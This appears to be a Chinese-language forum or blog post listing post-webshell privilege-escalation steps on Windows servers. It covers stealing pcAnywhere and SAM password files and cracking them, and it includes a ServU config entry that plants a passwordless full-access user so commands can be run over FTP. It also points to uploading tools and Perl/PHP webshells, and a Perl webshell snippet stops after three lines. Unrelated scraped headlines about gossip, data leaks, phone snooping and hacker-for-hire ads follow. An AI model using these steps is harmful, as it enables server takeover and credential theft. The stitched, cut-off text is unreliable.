当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就更好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码
c:\winnt\repaire 下是备份
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=dede|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有更高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
【蒋劲夫行踪不明】近日,蒋劲夫女友中浦悠花晒出多张脸部、身体淤青照:“最近这段时间,让关心我的大家担心了,我,中浦悠花还健在。蒋劲夫行踪不明的确与我有关,应律师和搜查相关人员的要求,恕我不便透露过多。...
大数据时代,仿佛每个人都在裸奔。 在A站近千万条数据公开泄露,以及有史以来最大规模微博微信盗号案告破的短短三个月内,今天又曝出了华住旗下多品牌酒店,超1亿用户个人信息及开房记录被挂在...
女人在感情上其实是很敏感的,一句话很有可能就会让自己想太多,但是女人对待感情的认真程度是一般人所想象不到的,当一个男人如果能做到下面这些说明他是真的很在乎你,那在窃听你的电话微信也是没有意义的。 怎...
【编者按】随着互联网世界的变化,QQ和微信越来越受到公众的欢迎,特别是微信已经进入了大多数人的社交和支付生活,但总有一些人出于各种不正当的原因,为了F法利益,想看到他人的隐私,笔者总结了一些防范对策其...
怎么调查别人手机里的微信聊天记录-免费接单黑客QQ 近期浙江温州的医院发生了一起奇怪的事。 有一伙人专门挑中午时间出入医院诊室。 经警方查证原来是黑客非法入侵。 而在其背后还有一个巨大的灰色产...
在单边主义、保护主义上升的大背景下,原始创新能力提升是纺织科技工作者肩负的历史责任。作为我国最早的纺织科技社会组织,中国纺织工程学会已经走过了90年辉煌历程,同时,2020年也是中国纺织工程学会第...